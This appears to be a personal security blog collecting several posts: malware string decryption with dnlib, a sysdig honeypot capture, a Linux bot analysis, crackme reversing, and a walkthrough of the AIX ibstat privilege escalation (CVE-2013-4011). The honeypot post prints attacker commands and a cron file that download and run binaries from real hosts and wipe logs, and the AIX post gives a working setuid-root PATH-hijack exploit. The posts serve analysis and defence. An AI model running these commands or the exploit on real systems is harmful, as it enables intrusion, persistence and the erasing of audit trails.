Agent Tesla Strings Decrypter

I wanted to take a look at dnlib trying to understand what are its possibilities. at the same point I had to deal with an ‘Agent Tesla’ sample, which used strings obfuscation with AES CBC 256 bits.

The decryption method was easy to find, as can be seen in the capture below:

A quick win consist to copy paste this method inside a new Visual Studio project, and it will do the job later.

First we have to load the assembly binary.

ModuleDefMD module = ModuleDefMD.Load(executable);

Next we parse the types and all the methods of the binary and search for a String opcode (value 114 in IL) and if the string is forwarded by a Call, that mean that the string is a method parameter.

foreach (TypeDef type in module.GetTypes())
{
countModule++;

foreach (MethodDef method in type.Methods)
{
//check if the method is not empty and if it not a constructor
if (!method.HasBody || method.IsConstructor)
continue;

countMethod++;

for (int i = 0; i < method.Body.Instructions.Count; i++)
{
if (method.Body.Instructions[i].OpCode.Value == 114) //OpCodes.Ldstr)
{
if (method.Body.Instructions[i + 1].OpCode == OpCodes.Call)
{

Now we can retreive the encrypted string, and past it to the DecryptString method. Afterwards, to get a clean output sample, we have to remove the string and the call to the real decryption method inside the loaded assembly

var cryptedstring = method.Body.Instructions[i].Operand.ToString();

string decryptedstring = DecryptString(cryptedstring);

//For exception max stack value
method.Body.KeepOldMaxStack = true;

method.Body.Instructions[i].OpCode = OpCodes.Ldstr;
method.Body.Instructions[i].Operand = decryptedstring;

method.Body.Instructions.Remove(method.Body.Instructions[i + 1]);

And finally we save our new clean assembly

String outputfilename = outputFolderName +" \\" + filename + "_uncrypt.exe";


module.Write(outputfilename);

Now opening the cleaned Assembly in Dnspy, we can see the clean strings:

Of course, if the algorithm changes, we have to fix inside the source code and rebuild the binary, which can be a bit painful. An evolution could be used a kind of reflexion to call the decryption method inside the loaded assembly (with is RVA for example). We will explore this another time.

As you can see, it's really easy to use the basic of DNlib, and we can do even more cool thinks!

The source code of the decrypter can be found on my github, in case it is useful to anyone.

If you see any bugs or have further ideas to make it great again, don't hesitate to message me.

Extract malware defender quarantine files

I haven’t post here from a lonnnng time… And i restart to explain a quick trick.

Few days ago, i search how to extract a malware from a malware defender quarantine files. A friend tell me, it’s encrypted by a RC4 and he give me the key. I have made a script to automatise that: MalwareDefenderDecrypter

The output is quite dirty, there is some bytes (probably headers) to remove until the MZ.

I have also add a kaspersky script decoder

Android VM remote debugging with IDA

If you want to remote debug an android binary in a VM, you can use IDA easily, but if, like me, you run IDA in an virtual machine, you need a trick.

IDA have binary for remote debug, you don’t need gdbserver,
ida-bin

So firstly copy android_server binary in your VM in the sdcard file, or use

adb push android_server /data/local/tmp

Start a shell on your Android VM and start android_server (don’t forget to add execute permission (chmod 755))

and-shell

Forward the debug port (23946), for use it on your local machine, now android_server port is just bind on your lo interface, it’s not accessible from an other interface, and you can’t use iptable to forward it. But redir can!

redir

Check it with a useful mnemonic command:
lapute
It’s cool 😉

Now configure IDA, select remote ARM Linux/Android debugger and Debugger->Process options:

conf-ida

Don’t forget to add just the remote paths, if IDA can’t find the binary in the android VM, he will upload it.

That’s all 🙂

Honeypot test

I recently heard ofa new system logger, .
It’s seem to bee very completly, it use strace, tcpdump,lsof for take trace.

I want to try it on a honeypot.

So, install a virtual machine with my favourite OS Debian 7.5 🙂

Install sysdig is very easy, type just one command

sysdig_install

Set basic password for root like “toor”, and start loggin with this command:

nohup sysdig -s 4096 -z -w /var/log/.syslog/$(hostname).scap.gz &

I use /var/log/.syslog for hidden the directory 🙂

And wait for attack! 😀

After, 4 hour, my VM was pwn.

Netstat
netstat

ps
ps

topnet
ps

topconnect
ps

Take a look at the command use by the bad guy

17:11:55 root)/usr/lib/openssh/sftp-server
17:12:48 root)chmod 7777 / etc
17:12:48 root)killall -9 .IptabLes
17:12:48 root)killall -9 nfsd4
17:12:48 root)killall -9 profild.key
17:12:48 root)cd /etc
17:12:48 root)rm -rf dir fake.cfg
17:12:48 root)killall -9 nfsd
17:12:48 root)killall -9 DDosl
17:12:48 root)killall -9 lengchao32
17:12:48 root)killall -9 b26
17:12:48 root)killall -9 Bill
17:12:48 root)killall -9 n26
17:12:48 root)killall -9 1
17:12:48 root)killall -9 codelove
17:12:48 root)killall -9 32
17:12:48 root)killall -9 m32
17:12:48 root)killall -9 m64
17:12:48 root)killall -9 64
17:12:48 root)killall -9 83BOT
17:12:48 root)killall -9 node24
17:12:48 root)killall -9 mimi
17:12:48 root)killall -9 nodeJR-1
17:12:48 root)killall -9 freeBSD
17:12:48 root)killall -9 ksapdd
17:12:48 root)killall -9 kysapdd
17:12:48 root)killall -9 sksapdd
17:12:48 root)killall -9 xsw
17:12:48 root)killall -9 syslogd
17:12:48 root)killall -9 skysapdd
17:12:48 root)killall -9 cupsddd
17:12:48 root)killall -9 ksapd
17:12:48 root)killall -9 atddd
17:12:48 root)killall -9 xfsdxd
17:12:48 root)killall -9 sfewfesfs
17:12:48 root)cd /root
17:12:48 root)chmod 7777 / etc
17:12:48 root)killall -9 minerd
17:12:48 root)killall -9 0
17:12:48 root)killall -9 joudckfr
17:12:48 root)killall -9 www
17:12:48 root)killall -9 log
17:12:48 root)killall -9 .IptabLex
17:12:48 root)killall -9 .Mm2
17:12:48 root)killall -9 acpid
17:12:48 root)killall -9 m64
17:12:48 root)killall -9 ./QQ
17:12:48 root)killall -9 QQ
17:12:48 root)killall -9 g3
17:12:48 root)killall -9 2
17:12:48 root)killall -9 3
17:12:48 root)killall -9 pm
17:12:48 root)killall -9 qweasd
17:12:48 root)killall -9 tangtang
17:12:48 root)killall -9 imap-login
17:12:48 root)killall -9 xudp
17:12:48 root)killall -9 txma
17:12:48 root)killall -9 mrdos64.b00
17:12:48 root)killall -9 mrdos32.b00
17:12:49 root)rm -rf dir kysapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sksapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir skysapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir xfsdxd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir fake.cfg
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir cupsdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir atdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ksapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir kysapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sksapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir skysapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir xfsdx.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sfewfesfs
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhjrtfyhuf
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir rewgtf3er4t
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sdmfdsfhjfe
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhddsfew
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ferwfrre
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir dsfrefr
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sfewfesfs.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhjrtfyhuf.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir rewgtf3er4t.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sdmfdsfhjfe.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhddsfew.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ferwfrre.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir dsfrefr.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 1.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 2.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 3.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 4.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 5.*
17:12:49 root)cd /var/spool/cron
17:12:49 root)rm -rf dir root.*
17:12:49 root)cd /var/spool/cron
17:12:49 root)rm -rf dir root
17:12:49 root)cd /var/spool/cron/crontabs
17:12:49 root)rm -rf dir root.*
17:12:49 root)cd /var/spool/cron/crontabs
17:12:49 root)rm -rf dir root
17:12:49 root)cd /var/spool/cron
17:12:49 root)wget http://122.224.34.75:8188/root
17:12:52 root)cd /var/spool/cron/crontabs
17:12:52 root)wget http://122.224.34.75:8188/root
17:12:54 root)cd /etc
17:12:54 root)wget http://122.224.34.75:8188/sfewfesfs
17:13:02 root)cd /etc
17:13:02 root)wget http://122.224.34.75:8188/gfhjrtfyhuf
17:13:12 root)cd /etc
17:13:12 root)wget http://122.224.34.75:8188/rewgtf3er4t
17:13:16 root)cd /etc
17:13:16 root)wget http://122.224.34.75:8188/sdmfdsfhjfe
17:13:22 root)cd /etc
17:13:22 root)wget http://122.224.34.75:8188/gfhddsfew
17:13:30 root)cd /etc
17:13:30 root)wget http://122.224.34.75:8188/ferwfrre
17:13:35 root)cd /etc
17:13:35 root)wget http://122.224.34.75:8188/dsfrefr
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 sfewfesfs
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 gfhjrtfyhuf
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 rewgtf3er4t
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 sdmfdsfhjfe
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 gfhddsfew
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 ferwfrre
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 dsfrefr
17:13:41 root)cd /etc
17:13:41 root)chattr +i sfewfesfs
17:13:41 root)nohup /etc/ferwfrre
17:13:41 root)nohup /etc/ferwfrre
17:13:41 root)nohup /etc/gfhddsfew
17:13:41 root)nohup /etc/gfhddsfew
17:13:41 root)nohup /etc/sdmfdsfhjfe
17:13:41 root)nohup /etc/sdmfdsfhjfe
17:13:41 root)nohup /etc/rewgtf3er4t
17:13:41 root)nohup /etc/rewgtf3er4t
17:13:41 root)nohup /etc/dsfrefr
17:13:41 root)nohup /etc/dsfrefr
17:13:41 root)rm -rf /root/.bash_history
17:13:41 root)nohup /etc/gfhjrtfyhuf
17:13:41 root)nohup /etc/gfhjrtfyhuf
17:13:41 root)touch /root/.bash_history
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /root
17:13:41 root)sleep 600
17:13:43 root)basename /usr/sbin/service
17:13:43 root)basename /usr/sbin/service
17:13:43 root)cd /
17:13:43 root)basename /usr/sbin/service
17:13:43 root)basename /usr/sbin/service
17:13:43 root)cd /
17:13:43 root)run-parts --lsbsysinit --list /lib/lsb/init-functions.d
17:13:43 root)grep -q permission
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t nat -L
17:13:43 root)/sbin/ebtables -t broute -L
17:13:43 root)/bin/echo -n Clearing ebtables rulesets:
17:13:43 root)/bin/echo -n filter
17:13:43 root)/sbin/ebtables -t filter --init-table
17:13:43 root)/bin/echo -n nat
17:13:43 root)/sbin/ebtables -t nat --init-table
17:13:43 root)/bin/echo -n broute
17:13:43 root)/sbin/ebtables -t broute --init-table
17:13:43 root)cut -d -f1
17:13:43 root)grep -E ^(ebt|ebtable)_ /proc/modules
17:13:43 root)rmmod ebtable_broute
17:13:43 root)rmmod ebtable_filter
17:13:43 root)rmmod ebtable_nat
17:13:43 root)rmmod ebtables
17:13:43 root)/bin/echo -n done
17:13:43 root)run-parts --lsbsysinit --list /lib/lsb/init-functions.d
17:13:43 root)grep -q permission
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t nat -L
17:13:43 root)/sbin/ebtables -t broute -L
17:13:43 root)/bin/echo -n Clearing ebtables rulesets:
17:13:43 root)/bin/echo -n filter
17:13:43 root)/sbin/ebtables -t filter --init-table
17:13:43 root)/bin/echo -n nat
17:13:43 root)/sbin/ebtables -t nat --init-table
17:13:43 root)/bin/echo -n broute
17:13:43 root)/sbin/ebtables -t broute --init-table
17:13:43 root)cut -d -f1
17:13:43 root)grep -E ^(ebt|ebtable)_ /proc/modules
17:13:43 root)rmmod ebtable_broute
17:13:43 root)rmmod ebtable_nat
17:13:43 root)rmmod ebtable_filter
17:13:43 root)rmmod ebtables
17:13:43 root)/bin/echo -n done
17:13:55 root)basename /usr/sbin/service
17:13:55 root)basename /usr/sbin/service
17:13:55 root)cd /
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:17:01 root)cd /
17:17:01 root)run-parts --report /etc/cron.hourly
17:21:29 root)ps -ef
17:21:34 root)ps -ef
17:22:14 root)ps -ef

He downloaded 8 binarys.
17:12:49 root)wget http://122.224.34.75:8188/root
17:12:54 root)wget http://122.224.34.75:8188/sfewfesfs
17:13:02 root)wget http://122.224.34.75:8188/gfhjrtfyhuf
17:13:12 root)wget http://122.224.34.75:8188/rewgtf3er4t
17:13:16 root)wget http://122.224.34.75:8188/sdmfdsfhjfe
17:13:22 root)wget http://122.224.34.75:8188/gfhddsfew
17:13:30 root)wget http://122.224.34.75:8188/ferwfrre
17:13:35 root)wget http://122.224.34.75:8188/dsfrefr

And we can find an over in /etc/.SSH2

MD5: 3f5c73745f7c17702bac0642a85d7d80 sha1: 34261024f4dfa63a16055230a325e8767cfef253 dsfrefr
MD5: a89c089b8d020034392536d66851b939 sha1: a1bfe161d49b50d62796618c768f4d06dcfe7d5f ferwfrre
MD5: 9401f208a419fb636520ea2aefc8bbd7 sha1: b66a0d68d3f8236b312a0434e504788f1a2f383c gfhddsfew
MD5: e7c2f99b30daf8d99f6b5911d25fd8c7 sha1: 06957097fe51829b4c7e8009cd3dce5ba565e920 gfhjrtfyhuf
MD5: dc893d16316489dffa4e8d86040189b2 sha1: 931077c1b93c387e87b29e2b206aff5e5e58c223 rewgtf3er4t
MD5: 5d10bcb15bedb4b94092c4c2e4d245b6 sha1: 6eba031ec658aeb82aed5b94c4ba829da38553f4 sdmfdsfhjfe
MD5: f9ad37bc11a4f5249b660cacadd14ad3 sha1: e41a40fdcd94718eef8a954ce67bd03ac5c70a00 sfewfesfs
MD5: dc893d16316489dffa4e8d86040189b2 sha1: 931077c1b93c387e87b29e2b206aff5e5e58c223 SSH2

Two binaries are packed with upx, sums when they unpacked:

MD5: 1da702a39ad4bc15c5a1e51422f4cd69 sha1: 529f5beda846688f43c748e3b78fd947aa6bf662 rewgtf3er4t
MD5: f9ad37bc11a4f5249b660cacadd14ad3 sha1: e41a40fdcd94718eef8a954ce67bd03ac5c70a00 sfewfesfs

rewgtf3er4t is the same binarie of SSH2, probably when rewgtf3er4t is launch it copy itselfe in /etc/.SSH2

Virus total analysis:

dsfrefr
ferwfrre
gfhddsfew
gfhjrtfyhuf
rewgtf3er4t
sdmfdsfhjfe
sfewfesfs
SSH2

And root file is intended to be used as a cronfile.

#more root | grep -v ^#
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 sdmfdsfhjfe
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 ferwfrre
*/94 * * * * killall -9 dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/ferwfrre
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1&
*/95 * * * * nohup /etc/dsfrefr > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c

Al binarys as know to be ddos tools and Elknot Trojan, if later i have a little more time, i try to reverse it.

Reference: draios.com

Simple crackme with Radare2

Jvoisin and Maijin, a members of my hackerspace (Hackgyver) always talk to me about Radare, a new reverse engineering open source framework which they are working on.

So i want to try it on a very simple Linux crackme.

Classic and easy install, download it to the git, configure, make and make install.

The condemned binary’s called “Easy_ELF”

Start to see who is it

rabin2

Sections:

sections

I want to see it’s strings.

strings

We have the good and bad boy and they offset 🙂

Try to launch the crackme:

launch

Ok, we can start static analysis, disassemble the 15 first lines

start

We arrive to the start function and we can see the main function start at 0x804851b.

Show the 30 first lines of the main function

begin

We assumed the password check function is at 0x8048451

check1

The first cmp compare the second letter of the pass with 0x31, an the fifth with 0x58.

All other characters is just xored.

xor

We have 0x4C 0x31 0x4E 0x55 0x58

rax

result

\o/

Radare support many architectures arm,x86, x86-64, gameboy, mips, sparc,… and many type of files, dex, bios, elf, PE, COFF. Radare team make a great work!

So, i have try 1% of all Radare possibility the 99% others is here:

Official web site

Documentation

rasm

other crackme

Cacher ses process aux autres utilisateurs

Depuis le kernel 3.2 un nouveau paramètre pour le système de fichier /proc a été introduit, “hidepid”, permettant d’afficher à l’utilisateur seulement ces propres process.

Pour l’activer, il suffit de modifier la ligne qui va bien dans /etc/fstab.


proc /proc proc defaults,hidepid=2 0 0

Differentes options possible:

0 Par défaut, tout le monde voit les process de tout le monde

1 L’utilisateur ne voit pas les autres process via ps, top etc .. mais peut toujours les lister dans /proc.

2 L’utilisateur ne voit pas les autres process via ps, top etc .. et ne peut pas les lister dans /proc.

Analysis of a Linux Malware

A few days ago, i receive a weird connection on my kippo honeypot.
An guy as connected on, download a binary file and try to lauch it, but, not succesfully.

Small_Kippo_capture

command_capture

So after some checks, i can download this binary :), so, go to analysis it!

$ file disknyp
disknyp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

$ du -sk disknyp
1460 disknyp

It’s statically linked, that’s explain is big size, and it’s not stripped 🙂

Hash:
MD5: 260533ebd353c3075c9dddf7784e86f9
SHA1: 9a40f162e5bcaac2d58c0363ef2baf7b4c1a9710

Look at the main function in IDA.

main

Coded in C++, it run as a daemon, after, it lauch _ZN9CStatBase10InitializeEv who get some system infos.

Initialize

_ZN9CStatBase13GetSysVersionEv do a uname command.
_ZN9CStatBase9GetCpuSpdEv get cpu info to /proc/cpuinfo and extract frequency.
__ZN9CStatBase13InitGetCPUUseEv open /proc/stat file and check cpu usage.
_ZN9CStatBase13InitGetNetUseEv open /proc/net/dev and get network informations.

After that it initialize the server:

Initialize_server

Lock at the decrypt fonction:

Decrypt

Decrypt fonction as call twice, one with the argument 281-206-3//18 (the C&C ip adress?), decrypt value is 190.115.20.27, and after with 68961 as the port number 59870.

Not necesseray to make a script to reverse this fonction, we can see decrypt values in memory, but this function is easy to understand, it make one ascii addition of the crypted value, after ascii soustraction and loops.

# netstat -laputen
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale Adresse distante Etat User Inode PID/Program name
tcp 4 0 192.168.1.69:46730 190.115.20.27:59870 ESTABLISHED 1000 138545 18345/disknyp

Localisation of the c&c:

geoloca

Belize, it’s not the right place for make malware, but rather to jump into the see and drink mojitos 🙂

After, it call _ZN8CManager15StartNetProcessEv fonction, who create a thread, initialize a socket, and send information.

start_server2

And it create an fake.cfg file, it’s containt the ip adress of my hosts, corresponding for me to the local adress.

$ cat fake.cfg
0
127.0.1.1:127.0.1.1
10000:60000

After it read /proc/stat and /proc/net/dev file and just send kernel version to the c&c in loop.

tcp_flow

Exploit CVE-2013-4011

In July 2013 we saw a new vulnerabilite on AIX, it’s possible to allow local users to gain privileges with a very simple way.

The fail is due to a programming error in ibstat command

(futex@aixbox) $ which ibstat
/usr/bin/ibstat
(futex@aixbox) $ ls -l /usr/bin/ibstat
lrwxrwxrwx    1 root     bin              16 01 oct 02:18 /usr/bin/ibstat -> /usr/sbin/ibstat
(futex@aixbox) $ ls -l /usr/sbin/ibstat
-r-sr-xr-x    1 root     bin           47388 12 nov 2012  /usr/sbin/ibstat

After hunts, the real binary is /usr/sbin/ibstat, and is setuid bit!

With a simple string command, we can see which command the binary use

(futex@aixbox) $ strings /usr/sbin/ibstat | grep ifconfig
ifconfig %s
(futex@aixbox) $ strings /usr/sbin/ibstat | grep arp
arp -t ib -a
(futex@aixbox) $ strings /usr/sbin/ibstat | grep lsattr
lsattr -El %s

As we can see, all command are not call with her full path! So, we can exploit it easilly.

We place ourselves in the tmp directory

(futex@aixbox) $ cd /tmp

And we create a script with the name of one command use in ibstat binary, his goal is just copy the shell binary in /tmp and set setuit bit

(futex@aixbox) $ vi arp

#!/bin/sh

cp /bin/sh /tmp/root
chown root /tmp/root
chmod 4755 /tmp/root

Don’t forget to set executable bit on the script

(futex@aixbox) $ chmod 755 ./arp

After, we change the PATH environnement variable:

(futex@aixbox) $ PATH=.:${PATH}
(futex@aixbox) $ which arp
./arp

And launch ibstat command

(futex@aixbox) $ ibstat -a -i en0

ERROR: “/dev/en0”: open failed rc=2, errno=2
Check device state of “icm” and “en0”.

===============================================================================
IB INTERFACE ARP TABLE
===============================================================================

/tmp/arp script is launch by ibstat command, this command have root owner and setuid bit, so it execute witch root priviliges, and lauch our script witch root privilege too 🙂


(futex@aixbox) $ ls -l /tmp/root
-rwsr-xr-x    1 root     sys          292606 14 oct 10:48 /tmp/root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys)
(futex@aixbox) $ ./root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys) euid=0(root)

ibstat command is in devices.common.IBM.ib.rte fileset

The following fileset levels are vulnerable:


AIX Fileset Lower Level Upper Level
-------------------------------------------------------
devices.common.IBM.ib.rte 6.1.6.0 6.1.6.21
devices.common.IBM.ib.rte 6.1.7.0 6.1.7.18
devices.common.IBM.ib.rte 6.1.8.0 6.1.8.15
devices.common.IBM.ib.rte 7.1.0.0 7.1.0.21
devices.common.IBM.ib.rte 7.1.1.0 7.1.1.18
devices.common.IBM.ib.rte 7.1.2.0 7.1.2.15

You must upgrade your system, or install thie fix


ftp://aix.software.ibm.com/aix/efixes/security/infiniband_fix.tar

Rock it!

Bienvenue

Bienvenue sur mon blog,

Son but est de partager les bidouilles, expériences et compétences que j’ai dans l’informatique en générale, la sécurité puis un peu tout et n’importe quoi.

Bonne visite.